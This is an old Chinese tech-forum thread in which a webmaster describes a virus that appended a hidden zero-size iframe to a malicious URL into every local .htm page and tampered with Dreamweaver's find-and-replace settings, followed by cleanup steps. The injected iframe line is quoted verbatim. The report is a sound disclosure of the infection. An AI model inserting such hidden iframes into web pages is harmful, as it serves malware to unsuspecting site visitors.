EMU618社区

 找回密码
 立即注册
搜索
查看: 2995|回复: 3

[分享] [病毒]某毒对本地网页进行了篡改...

[复制链接]

签到天数: 2 天

[LV.1]初来乍到

发表于 2007-7-13 18:17:33 | 显示全部楼层 |阅读模式
条件: 本地IIS装载页面,有网络条件,中毒后假如浏览本地网页,整个站点下的htm文件全部被篡改——在每个网页的</html>标签后面加了 "<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>".
之后只要任何人打开这个站点的任何页面就会中好几个木马.

对于能篡改网页代码的病毒,在下还是第一次遇到,在网上查了下,貌似也没什么真正有效的方法.

最后只好从注册表找找原因了...找到了这个:
HKEY_CURRENT_USER\Software\Macromedia\Dreamweaver 8\Find And Replace
里面被改成上面那个恶意网站的地址相关信息了...

最后缓冲临时文件什么一次过清除,再将网页替换掉才勉强解决了,不过还有个东西未解决...Pket.exe...打开网页的状态下隔一段时间就会出来...进程无异常...

不过无所谓了,反正不影响使用就得了...

评分

1

查看全部评分

签到天数: 1 天

[LV.1]初来乍到

发表于 2007-7-13 20:39:57 | 显示全部楼层
希望对喜欢自己做站的朋友有所帮助.

其实病毒也是程序,也拥有字符搜索,文本读取的功能.想到这点也就不会感到奇怪了.

签到天数: 2 天

[LV.1]初来乍到

 楼主| 发表于 2007-7-14 13:13:44 | 显示全部楼层

补充一下...

该毒是会篡改你硬盘上所有网页文件...
不过貌似都是些htm...asp那些就不清楚了...
今天检查处理了一个上午...

签到天数: 2 天

[LV.1]初来乍到

 楼主| 发表于 2007-7-17 12:06:11 | 显示全部楼层

今天确认Dreamweaver被篡改...

用DW新建立静态页面会在</html>后面生成上面所说的那个恶意链接...卸载重装可以解决.
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|国治模拟精品屋 ( 沪ICP备15012945号-1 )

GMT+8, 2024-12-27 14:46 , Processed in 1.088867 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表